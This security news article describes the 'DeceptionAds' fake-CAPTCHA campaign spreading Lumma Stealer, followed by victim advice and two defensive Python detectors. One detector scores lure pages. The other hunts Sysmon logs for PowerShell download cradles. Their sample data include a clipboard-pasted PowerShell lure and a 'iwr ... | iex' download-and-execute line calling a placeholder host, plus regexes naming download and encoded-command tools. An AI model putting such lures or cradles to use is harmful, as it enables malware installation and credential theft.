Security researchers at Guardio Labs have uncovered a sophisticated malvertising campaign dubbed “DeceptionAds” that employs deceptive CAPTCHA pages to distribute the Lumma Stealer malware. This large-scale operation leverages legitimate advertising networks to reach over one million users daily.
Campaign Infrastructure and Distribution Tactics
The threat actors, believed to be associated with the Vane Viper group, have orchestrated a massive distribution network through the Monetag advertising platform. The campaign generates over one million daily ad impressions across 3,000 websites, primarily targeting users of pirated streaming services and unauthorized software distribution platforms.
Technical Sophistication and Evasion Methods
The attackers leverage BeMob, a legitimate ad tracking service, to circumvent content moderation systems. Instead of direct malicious URLs, the campaign utilizes obfuscated tracking links that appear legitimate to automated security scanning systems. This technique allows malicious content to persist on advertising platforms far longer than direct links would.
Infection Chain and Malware Capabilities
The infection process begins when the user lands on a fraudulent CAPTCHA page containing hidden JavaScript. The script silently copies a malicious PowerShell command to the victim’s clipboard, and the page instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter. Once the command runs, it downloads and installs Lumma Stealer. The malware targets sensitive information across major browsers, including:
- Stored credentials and passwords
- Browser cookies and active session tokens
- Credit card information saved in browsers
- Browsing history and autofill form data
- Cryptocurrency wallet files and seed phrases
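As an added example (not code from Guardio Labs, Monetag or the campaign itself), the following Python heuristic classifies fetched HTML by whether it combines a scripted clipboard write with on-screen instructions to press the Run-dialog shortcuts, which is the lure pattern described above. The indicator names, the scoring thresholds and the three sample pages are constructed for illustration; it is a triage aid for a URL-scanning or web-proxy pipeline, not a substitute for endpoint controls.

```python
import re

# Indicator regexes. The names are ours (hypothetical) and mirror the three
# stages of the lure: a scripted clipboard write, instructions to use the Run
# dialog shortcuts, and a PowerShell-looking payload string.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
RUN_SHORTCUTS = re.compile(
    r"win(dows)?(\s*key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b", re.I)
POWERSHELL_LIKE = re.compile(
    r"powershell(\.exe)?|\biwr\b|invoke-webrequest|-enc(odedcommand)?\b|\bmshta\b", re.I)
VERIFY_LURE = re.compile(r"(verify|prove).{0,40}(human|robot)", re.I | re.S)


def score_page(html: str) -> dict:
    """Classify one HTML document.

    The core signal is a clipboard write co-occurring with Run-dialog
    shortcut instructions: a genuine CAPTCHA never asks for Win+R or
    Ctrl+V. The other two indicators only raise confidence, so a docs page
    with a 'copy' button and no shortcut instructions stays clean.
    """
    hits = {
        "clipboard_write": bool(CLIPBOARD_WRITE.search(html)),
        "run_shortcuts": bool(RUN_SHORTCUTS.search(html)),
        "powershell_like": bool(POWERSHELL_LIKE.search(html)),
        "verify_lure": bool(VERIFY_LURE.search(html)),
    }
    core = hits["clipboard_write"] and hits["run_shortcuts"]
    score = sum(hits.values())
    if core and score >= 3:
        verdict = "malicious"
    elif core:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "score": score, "hits": hits}


# Constructed sample pages (not captures from the campaign). The payload
# string in the fake page is a placeholder, not a real command.
FAKE_CAPTCHA = """<html><body>
<h2>Verify you are human</h2>
<p>1. Press Windows Key + R   2. Press Ctrl + V   3. Press Enter</p>
<script>
  document.addEventListener('click', function () {
    navigator.clipboard.writeText("powershell -w hidden PLACEHOLDER_COMMAND");
  });
</script></body></html>"""

REAL_CAPTCHA = """<html><body>
<p>Please verify you are human by selecting the checkbox.</p>
<div role="checkbox" aria-label="I'm not a robot"></div>
</body></html>"""

DOCS_COPY_BUTTON = """<html><body>
<pre>pip install requests</pre>
<button onclick="navigator.clipboard.writeText('pip install requests')">Copy</button>
<p>Paste the command into your terminal and press Enter.</p>
</body></html>"""


def scan_pages(pages: dict) -> dict:
    """Map page name -> verdict for a batch of fetched documents."""
    return {name: score_page(html)["verdict"] for name, html in pages.items()}


if __name__ == "__main__":
    batch = {"fake": FAKE_CAPTCHA, "real": REAL_CAPTCHA, "docs": DOCS_COPY_BUTTON}
    for name, verdict in scan_pages(batch).items():
        print(f"{name:>5}: {verdict}")
```

The false-positive control is the `DOCS_COPY_BUTTON` sample: a documentation page legitimately writes to the clipboard, so clipboard access alone must not trigger; it is the pairing with Win+R / Ctrl+V instructions that no real CAPTCHA ever issues.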
Who Is at Risk
Windows users who browse ad-supported websites — particularly piracy and freeware sites — are the primary targets. Anyone who has recently interacted with an unusual CAPTCHA prompt asking them to press keyboard shortcuts (Win+R, Ctrl+V, Enter) should treat their system as potentially compromised and scan immediately. Lumma Stealer exfiltrates data silently; victims typically have no visible symptoms until credentials are abused.
What to Do If You Encountered This Campaign
- Run a full scan with a reputable endpoint protection tool (Microsoft Defender, Malwarebytes) immediately
- Change all passwords stored in your browser from a clean, unaffected device
- Revoke and regenerate any cryptocurrency wallet keys or move funds to a new wallet
- Invalidate all active browser sessions by logging out across all accounts
- Enable multi-factor authentication on email, banking, and crypto accounts
Mitigation for Organizations
Monetag suspended approximately 200 malicious advertiser accounts, but the campaign adapted quickly by shifting to alternative advertising platforms. MITRE ATT&CK tracks this PowerShell execution, including its clipboard-delivered form, under technique T1059.001 (Command and Scripting Interpreter: PowerShell). Security teams should use Group Policy to prevent users from executing clipboard-pasted commands and deploy CISA-recommended endpoint hardening. Legitimate CAPTCHA services never require users to open a command prompt or run keyboard shortcuts.
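The following Python script, added here as an example and not a rule from MITRE, CISA or any vendor, shows the endpoint-side hunt for this chain in process-creation telemetry: the Run dialog spawns its child directly under explorer.exe, so a PowerShell launch with that parent plus cradle-like arguments (hidden window, web download, inline execution, encoded command) is the T1059.001 pattern the article describes. The events, usernames and URL are constructed placeholders using Sysmon Event ID 1 field names; the indicator names and severity levels are ours.

```python
import json
import re

# Constructed Sysmon Event ID 1-style process-creation records (JSON lines).
# Field names follow the Sysmon convention; hosts, users and the URL are
# placeholders, not indicators from the campaign.
SAMPLE_EVENTS = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -w hidden -c \"iwr http://EXAMPLE_PLACEHOLDER/x | iex\"","User":"DESKTOP\\alice"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell","User":"DESKTOP\\bob"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1","User":"NT AUTHORITY\\SYSTEM"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe","User":"DESKTOP\\alice"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAA==","User":"DESKTOP\\carol"}
"""

# The Run dialog (Win+R) launches its child directly under explorer.exe, so a
# PowerShell process with that parent is interactive, user-driven execution.
# Consoles, script hosts and scheduled tasks have other parents.
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)
POWERSHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

# Command-line traits of a one-line download-and-execute cradle. Indicator
# names are ours (hypothetical); the patterns are generic PowerShell syntax.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
}


def parse_events(text: str) -> list:
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def evaluate(event: dict):
    """Return a finding for a PowerShell launch worth reviewing, else None.

    high   : from the Run dialog with cradle-like arguments (the chain above)
    medium : cradle-like arguments under any other parent
    low    : plain PowerShell from the Run dialog (unusual for most users)
    """
    if not POWERSHELL_IMAGE.search(event.get("Image", "")):
        return None
    cmd = event.get("CommandLine", "")
    fired = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    from_run_dialog = bool(RUN_DIALOG_PARENT.search(event.get("ParentImage", "")))
    if from_run_dialog and fired:
        severity = "high"
    elif fired:
        severity = "medium"
    elif from_run_dialog:
        severity = "low"
    else:
        return None
    return {"user": event.get("User"), "severity": severity,
            "indicators": fired, "technique": "T1059.001"}


def hunt(text: str) -> list:
    """Run evaluate() over a JSON-lines export and keep only the findings."""
    return [f for f in (evaluate(e) for e in parse_events(text)) if f]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed export, the scheduled-task PowerShell under svchost.exe and the notepad launch produce no findings, the bare `powershell` from the Run dialog is reported as low, and the two Run-dialog launches carrying a download cradle or an encoded command are reported as high. The parent-process condition is what keeps the rule quiet on administrators who run PowerShell from a console.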